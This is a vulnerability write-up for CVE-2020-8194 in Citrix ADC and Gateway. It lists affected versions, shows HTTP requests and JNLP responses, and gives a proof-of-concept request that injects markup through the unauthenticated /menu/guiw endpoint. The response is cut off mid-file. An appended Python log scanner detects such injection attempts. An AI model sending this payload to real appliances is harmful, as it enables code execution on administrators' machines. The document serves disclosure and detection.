
(CVE-2020-8194) Citrix unauthenticated access leading to arbitrary code execution

1. Vulnerability overview

Citrix ADC and Citrix NetScaler Gateway contain a code injection vulnerability. An unauthenticated remote attacker can use it to create a malicious file which, if executed by a victim on the management network, allows the attacker to run arbitrary code in that user's context.

2. Affected versions

Citrix ADC and Citrix Gateway: < 13.0-58.30

Citrix ADC and NetScaler Gateway: < 12.1-57.18

Citrix ADC and NetScaler Gateway: < 12.0-63.21

Citrix ADC and NetScaler Gateway: < 11.1-64.14

NetScaler ADC and NetScaler Gateway: < 10.5-70.18

Citrix SD-WAN WANOP: < 11.1.1a

Citrix SD-WAN WANOP: < 11.0.3d

Citrix SD-WAN WANOP: < 10.2.7

Citrix Gateway Plug-in for Linux: < 1.0.0.137

3. Reproduction steps

A Java Web Start file is generated by requesting the following URL, which requires no authentication:

GET /menu/guiw?nsbrand=1&protocol=2&id=3&nsvpx=4 HTTP/1.1
Host: www.0-sec.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: startupapp=st
Upgrade-Insecure-Requests: 1

Citrix then returns a generated file to the user, and that file is permitted to connect to the Citrix appliance:

HTTP/1.1 200 OK
Date: Tue, 21 Jan 2020 20:32:44 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=10
X-XSS-Protection: 1; mode=block
Content-Length: 2320
Connection: close
Content-Type: application/x-java-jnlp-file

<jnlp codebase="2://citrix.local" href="/menu/guiw?nsbrand=1&protocol=2&id=3&nsvpx=4">

<information>
<title>GUI citrix.local</title>
<vendor>Citrix Systems, Inc.</vendor>
<homepage href="help/im/help.htm"/>
<description>Configuration Utility - Web Start Client</description>
<icon href="admin_ui/common/images/guiicon.gif"/>
<shortcut online="true">
<desktop/>
</shortcut>
</information>

<security>
<all-permissions/>
</security>

<resources>
<j2se version="1.6+" initial-heap-size="256M" max-heap-size="256M" />
<jar href="/admin_ui/php/application/views/applets/gui.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_images.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view1.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view2.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view3.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view4.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view5.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view6.jar"/>
<jar href="/admin_ui/php/application/views/applets/gui_view7.jar"/>
<jar href="/admin_ui/php/application/views/applets/guicommon.jar"/>
<jar href="/admin_ui/php/application/views/applets/ns.jar"/>
<jar href="/admin_ui/php/application/views/applets/jnlp.jar"/>
<jar href="/admin_ui/php/application/views/applets/sinetfactory.jar"/>
<jar href="/admin_ui/php/application/views/applets/sslava.jar"/>
<jar href="/admin_ui/php/application/views/applets/pixl.jar"/>
<jar href="/admin_ui/php/application/views/applets/looks.jar"/>
<jar href="/admin_ui/php/application/views/applets/l2fprod-common-tasks.jar"/>
<jar href="/admin_ui/php/application/views/applets/commons-codec.jar"/>
<jar href="/admin_ui/php/application/views/applets/java40.jar"/>
<jar href="/admin_ui/php/application/views/applets/prefuse.jar"/>
<jar href="/admin_ui/php/application/views/applets/gson.jar"/>
</resources>

<application-desc main-class="ns.im.Gui">
<argument>-D</argument>
<argument>0</argument>
<argument>-WS</argument>
<argument>0</argument>
<argument>-codebase</argument>
<argument>2://citrix.local</argument>
<argument>-ns4</argument>
<argument>1</argument>
<argument>-ns10</argument>
<argument>4</argument>
</application-desc>
</jnlp>

As shown above, the user-supplied query parameters are reflected directly into the generated output, so we can try to get malicious code executed:

GET /menu/guiw?nsbrand=HENKA&protocol=wiki.0-sec.org">&id=HENKC&nsvpx=phpinfo HTTP/1.1
Host: www.0-sec.org

Response:

HTTP/1.1 200 OK
Date: Sun, 26 Jan 2020 12:52:01 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=10
X-XSS-Protection: 1; mode=block
Content-Length: 2398
Connection: close
Content-Type: application/x-java-jnlp-file

&lt;jnlp codebase="wiki.0-sec.org"&gt;://www.0-sec.org" href="/menu/guiw?nsbrand=HENKA&amp;protocol=wiki.0-sec.org"&gt;&amp;id=HENKC&amp;nsvpx=phpinfo"&gt;

&lt;information&gt;
&lt;title&gt;GUI citrix.local&lt;/title&gt;
&lt;vendor&gt;Citrix Systems, Inc.&lt;/vendor&gt;
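As an added defensive example (not part of the original write-up), the following Python scans Apache-style access log lines for /menu/guiw requests whose reflected parameters (nsbrand, protocol, id, nsvpx) contain characters that would break out of the JNLP XML. The log lines are constructed, and the assumption that legitimate values are short numeric strings (as in the benign request above) is mine.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query parameters that /menu/guiw reflects into the generated JNLP file.
REFLECTED_PARAMS = ("nsbrand", "protocol", "id", "nsvpx")
# Characters that terminate an XML attribute or element inside the JNLP.
XML_BREAKOUT = re.compile(r'["<>&\']')
# Request field of an Apache combined log line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def extract_guiw_params(log_line):
    """Return the reflected parameters if the line requests /menu/guiw, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != "/menu/guiw":
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    return {k: qs.get(k, [""])[0] for k in REFLECTED_PARAMS}

def classify(params):
    """Grade one request: 'injection', 'suspicious' or 'benign'."""
    if any(XML_BREAKOUT.search(v) for v in params.values()):
        return "injection"      # value can break out of the JNLP markup
    if all(v.isdigit() for v in params.values()):
        return "benign"         # assumed legitimate shape: numeric only
    return "suspicious"         # non-numeric but not a markup breakout

def scan_log(lines):
    """Return (line_number, verdict, params) for every /menu/guiw request."""
    findings = []
    for n, line in enumerate(lines, 1):
        params = extract_guiw_params(line)
        if params is not None:
            findings.append((n, classify(params), params))
    return findings

# Constructed sample log: one normal request, one attempt like the one above,
# and one unrelated request that must be ignored.
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Jan/2020:12:52:01 +0000] "GET /menu/guiw?nsbrand=1&protocol=2&id=3&nsvpx=4 HTTP/1.1" 200 2320 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Jan/2020:12:52:07 +0000] "GET /menu/guiw?nsbrand=HENKA&protocol=wiki.0-sec.org%22%3E&id=HENKC&nsvpx=phpinfo HTTP/1.1" 200 2398 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [26/Jan/2020:12:53:00 +0000] "GET /vpn/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, verdict, params in scan_log(SAMPLE_LOG):
        print(f"line {n}: {verdict} {params}")
```

Because the appliance serves /menu/guiw without authentication, any non-numeric value in these parameters from an unexpected source is worth an alert, not just the clear breakout cases.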